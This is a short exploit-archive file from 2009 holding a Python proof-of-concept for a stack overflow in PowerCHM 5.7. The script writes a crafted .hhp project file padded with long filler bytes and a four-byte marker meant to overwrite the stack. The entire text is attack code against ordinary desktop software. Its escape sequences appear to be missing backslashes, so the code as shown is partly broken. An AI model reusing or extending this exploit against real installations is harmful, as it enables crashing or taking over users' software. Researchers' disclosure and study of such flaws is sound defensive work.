powerchm-overflow.txt
Posted on 28 March 2009
# exploit.py # PowerCHM 5.7 (hhp file) Stack overflow PoC # By:Encrypt3d.M!nd # # Orginally Discovered by: # Biks Security (http://security.biks.vn/?p=365) # header = ( "[OPTIONS] " "Compatibility=1.1 or later " "Compiled file=bratax.chm " "Contents file=aaaaaa.hhc " "Index file=aaaaaa.hhk " "Language=0x813 Dutch (Belgium) " "Title= " "Error log file=Errlog.txt " "Default Window=main " "[WINDOWS] " 'main="","aaaaaa.hhc","aaaaaa.hhk","","",,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0 ' "[FILES] " "[INFOTYPES] ") file=open('poc.hhp','w') file.write(header+"x41"*999+"x42x42x42x42"+"x43"*500) file.close()
